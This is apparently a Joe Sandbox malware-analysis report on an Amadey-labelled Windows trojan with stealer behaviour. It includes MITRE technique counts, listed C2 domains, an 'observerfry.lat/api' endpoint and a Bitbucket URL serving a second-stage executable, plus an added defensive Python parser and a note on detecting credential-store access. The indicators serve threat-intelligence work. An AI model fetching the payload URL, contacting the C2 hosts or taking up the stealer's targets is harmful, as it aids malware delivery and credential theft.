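The breadth check is the point: a backup agent may read Login Data, a wallet may read its own directory, but a process that touches browser credential stores, extension storage, FTP configs and wallets in one session matches the report's behaviour and almost nothing benign. In production the owner list should also be keyed on signer or path, since a stealer can be named chrome.exe.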

                Remote Access Functionality

Source: Yara match; File source: Process Memory Space: zLP3oiwG1g.exe PID: 7300, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (number of signature hits per technique; the matrix's unmatched placeholder techniques are omitted)

Reconnaissance: no signature hits
Resource Development: no signature hits
Initial Access: no signature hits
Execution: Windows Management Instrumentation (2), PowerShell (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (2), DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (34), Process Injection (2), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2)
Discovery: Query Registry (1), Security Software Discovery (751), Virtualization/Sandbox Evasion (34), Process Discovery (2), File and Directory Discovery (2), System Information Discovery (223)
Lateral Movement: no signature hits
Collection: Archive Collected Data (1), Data from Local System (41)
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (114)
Exfiltration: no signature hits
Impact: no signature hits
Antivirus detections for the submitted sample

Source | Detection | Scanner | Label
zLP3oiwG1g.exe | 58% | Virustotal |
zLP3oiwG1g.exe | 61% | ReversingLabs | Win32.Trojan.Amadey
zLP3oiwG1g.exe | 100% | Avira | TR/Crypt.TPM.Gen
zLP3oiwG1g.exe | 100% | Joe Sandbox ML |

No Antivirus matches in the remaining four scan tables (dropped files, unpacked PE files, domains, URLs).
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.217.67.100 | true | false | | high
bitbucket.org | 185.166.143.48 | true | false | | high
observerfry.lat | 104.21.36.201 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
Contacted URLs and C2 domains from the malware configuration

Name | Malicious | Antivirus Detection | Reputation
slipperyloo.lat | true | | unknown
curverpluch.lat | true | | unknown
tentabatte.lat | true | | unknown
manyrestro.lat | true | | unknown
bashfulacid.lat | true | | unknown
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high
observerfry.lat | true | | unknown
wordyfindy.lat | true | | unknown
https://observerfry.lat/api | true | | unknown
shapestickyr.lat | true | | unknown
talkynicer.lat | true | | unknown
URLs found in process memory (Name | Source | Malicious | Antivirus Detection | Reputation)

https://bitbucket.org/Q= | zLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1- | zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat/s | zLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://observerfry.lat/pi | zLP3oiwG1g.exe, 00000000.00000003.1470717759.000000000037E000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1466927575.000000000037E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr | zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg | zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700 | zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0 | zLP3oiwG1g.exe, 00000000.00000002.1887616838.00000000001BA000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi | zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeT2 | zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                      https://aui-cdn.atlassian.com/zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exexzLP3oiwG1g.exe, 00000000.00000002.1887811563.000000000030B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://observerfry.lat/H(zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1444894119.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418508560.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1420455624.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1418683409.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctazLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.mozilla.org/products/firefoxgro.allzLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://observerfry.lat:443/apizLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://observerfry.lat:443/apin.txtPKzLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://bitbucket.org/zLP3oiwG1g.exe, zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://bbuseruploads.s3.amazonaws.com:443$$zLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://bbuseruploads.s3.amazonaws.com/pzLP3oiwG1g.exe, 00000000.00000003.1618522019.0000000000377000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exezLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icozLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://web-security-reports.services.atlassian.com/csp-report/bb-websitezLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://observerfry.lat/api&04zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                            high
                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64zLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://observerfry.lat/zLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445178694.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445027007.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442892518.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442445932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445987512.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1393576879.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543194348.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445509932.00000000051BF000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051BC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.000000000037C000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000377000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1442722226.00000000051BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://ocsp.rootca1.amazontrust.com0:zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorzLP3oiwG1g.exe, 00000000.00000003.1618402977.00000000051BD000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893736231.0000000005929000.00000002.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.ecosia.org/newtab/zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brzLP3oiwG1g.exe, 00000000.00000003.1420184620.000000000525A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://dz8aopenkvv6s.cloudfront.netzLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ac.ecosia.org/autocomplete?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.microzLP3oiwG1g.exe, 00000000.00000003.1543300122.0000000000356000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1446181758.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1484141788.0000000000353000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1467082412.0000000000342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgzLP3oiwG1g.exe, 00000000.00000003.1420495784.000000000520B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.cookielaw.org/zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AE000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1887811563.0000000000342000.00000004.00000020.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://bitbucket.org/DzLP3oiwG1g.exe, 00000000.00000003.1543259911.000000000037A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://observerfry.lat/))zLP3oiwG1g.exe, 00000000.00000003.1470542881.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1419335143.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396948693.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1543075788.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396086235.00000000051A9000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396513281.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1618442191.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1470979861.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1445721130.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1396336946.00000000051AC000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=zLP3oiwG1g.exe, 00000000.00000003.1366230963.0000000005169000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1365911755.000000000516C000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1366695801.0000000005169000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://bbuseruploads.s3.amazonaws.com/zLP3oiwG1g.exefalse
                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.199.72 | unknown | United States | 13335 | CLOUDFLARENETUS | true
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
52.217.67.100 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
104.21.36.201 | observerfry.lat | United States | 13335 | CLOUDFLARENETUS | false
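The two tables above are what an analyst actually mines for block-list indicators, and the extraction fuses their cells: the URL is glued to the first Source token (the sample name), the Source cell ends in the Malicious flag, the IP table glues Domain to Country and ASN to its name and flag. The following is an added example, not Joe Sandbox code and not part of the report: a parser for these flattened rows, run over a subset of rows copied from the tables above, that turns them into records and applies a triage rule chosen here as an assumption: a host is a C2 candidate when its reputation is "unknown" and the sample actually resolved it. The report's own Malicious flag is "false" on every URL row, including observerfry.lat, so the flag alone finds nothing; reputation alone over-selects (the Atlassian staging host remote-app-switcher.stg-east.frontend.public.atl-paas.net is also "unknown"); the join against the resolution table is what separates the host the sample talked to from strings that merely sat in memory. The host regex and the dump-name regex are the example's own assumptions about the report's formatting.

```python
"""Recover block-list indicators from a flattened Joe Sandbox URL/IP table (added example)."""
import re
from dataclasses import dataclass

SAMPLE_NAME = "zLP3oiwG1g.exe"  # first Source token; the extraction glues it to the URL cell

# Constructed input: rows copied verbatim from the report tables above, in their
# flattened form (fused "URL + Source + Malicious" cell, then the Reputation cell).
URL_ROWS = [
    "https://observerfry.lat:443/apizLP3oiwG1g.exe, 00000000.00000002.1887811563.00000000002F4000.00000004.00000020.00020000.00000000.sdmpfalse",
    "unknown",
    "https://observerfry.lat/H(zLP3oiwG1g.exe, 00000000.00000003.1483664745.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, zLP3oiwG1g.exe, 00000000.00000003.1444894119.00000000051BF000.00000004.00000800.00020000.00000000.sdmpfalse",
    "unknown",
    "https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0zLP3oiwG1g.exe, 00000000.00000002.1887616838.00000000001BA000.00000004.00000010.00020000.00000000.sdmpfalse",
    "high",
    "http://x1.c.lencr.org/0zLP3oiwG1g.exe, 00000000.00000003.1419189430.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse",
    "high",
    "https://bbuseruploads.s3.amazonaws.com/zLP3oiwG1g.exefalse",
    "high",
    "https://remote-app-switcher.stg-east.frontend.public.atl-paas.netzLP3oiwG1g.exe, 00000000.00000002.1893151594.00000000051AE000.00000004.00000800.00020000.00000000.sdmpfalse",
    "unknown",
]
IP_ROWS = [  # IP, fused Domain+Country, fused ASN+Name+Malicious
    "172.67.199.72", "unknownUnited States", "13335CLOUDFLARENETUStrue",
    "185.166.143.48", "bitbucket.orgGermany", "16509AMAZON-02USfalse",
    "104.21.36.201", "observerfry.latUnited States", "13335CLOUDFLARENETUSfalse",
]

HOST_RE = re.compile(r"^[a-z]+://([A-Za-z0-9.-]+)")            # assumption: scheme://host[:port]...
# Memory-dump names as printed in the report: eight dot-separated fields and a .sdmp suffix (assumption)
DUMP_RE = re.compile(r"\d{8}\.\d{8}\.\d+\.[0-9A-F]{16}(?:\.\d{8}){4}\.sdmp")
DOMAIN_COUNTRY_RE = re.compile(r"^(\S+?)([A-Z][a-z]+(?: [A-Z][a-z]+)*)$")  # country = capitalised words
ASN_RE = re.compile(r"^(\d+)(.+?)(true|false)$")


@dataclass
class UrlRecord:
    url: str            # as recovered from memory; may carry bytes from adjacent data ("/H(", "/))")
    host: str
    dumps: list         # memory dumps the string was found in
    malicious: bool     # the report's Malicious column
    reputation: str     # the report's Reputation column


@dataclass
class IpRecord:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str       # the report prints the ASN name with a two-letter country code fused on
    malicious: bool


def parse_url_rows(rows):
    """Pair each fused URL cell with the Reputation line that follows it."""
    records = []
    for cell, reputation in zip(rows[0::2], rows[1::2]):
        url, _, rest = cell.partition(SAMPLE_NAME)   # split before the host regex sees the sample name
        host = HOST_RE.match(url)
        if not host:
            continue
        records.append(UrlRecord(url=url, host=host.group(1).lower(), dumps=DUMP_RE.findall(rest),
                                 malicious=rest.endswith("true"), reputation=reputation.strip()))
    return records


def parse_ip_rows(rows):
    """Three lines per IP: address, Domain+Country, ASN+Name+Malicious."""
    records = []
    for ip, dom_cc, asn_cell in zip(rows[0::3], rows[1::3], rows[2::3]):
        dm, am = DOMAIN_COUNTRY_RE.match(dom_cc), ASN_RE.match(asn_cell)
        if not (dm and am):
            continue
        records.append(IpRecord(ip=ip, domain=dm.group(1), country=dm.group(2), asn=int(am.group(1)),
                                asn_name=am.group(2), malicious=am.group(3) == "true"))
    return records


def triage(url_records, ip_records):
    """Unknown-reputation hosts, split into those the sample resolved (with their IPs)
    and those that only occur as strings in memory. Triage rule is this example's assumption."""
    ip_by_domain = {}
    for r in ip_records:
        ip_by_domain.setdefault(r.domain, []).append(r.ip)
    unknown_hosts = sorted({r.host for r in url_records if r.reputation == "unknown"})
    contacted = {h: ip_by_domain[h] for h in unknown_hosts if h in ip_by_domain}
    unresolved = [h for h in unknown_hosts if h not in ip_by_domain]
    return contacted, unresolved


def endpoints(url_records, host):
    """Distinct URL strings seen for a host; block on the host, the paths carry memory noise."""
    return sorted({r.url for r in url_records if r.host == host})


if __name__ == "__main__":
    urls, ips = parse_url_rows(URL_ROWS), parse_ip_rows(IP_ROWS)
    contacted, unresolved = triage(urls, ips)
    print("contacted:", contacted)          # {'observerfry.lat': ['104.21.36.201']}
    print("review manually:", unresolved)   # the Atlassian staging host
    for h in contacted:
        print(h, endpoints(urls, h))
```

Two things the output makes visible that the raw table does not: the Malicious column in the IP table marks 172.67.199.72 (no resolved domain) true and 104.21.36.201 (observerfry.lat) false, both in the same Cloudflare ASN, so the flag and the resolution do not line up and the domain is the indicator to act on; and the "/api" path is the only observerfry.lat endpoint recovered cleanly, the other strings end in bytes from adjacent memory.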
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579725
Start date and time: 2024-12-23 08:07:38 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: zLP3oiwG1g.exe (renamed because the original name is a hash value)
Original Sample Name: ad848f9eed40c0533c28f2c521395df8.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@4/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 12
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.109.210.53, 20.190.147.9
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                  • Execution Graph export aborted for target zLP3oiwG1g.exe, PID 7300 because there are no executed function
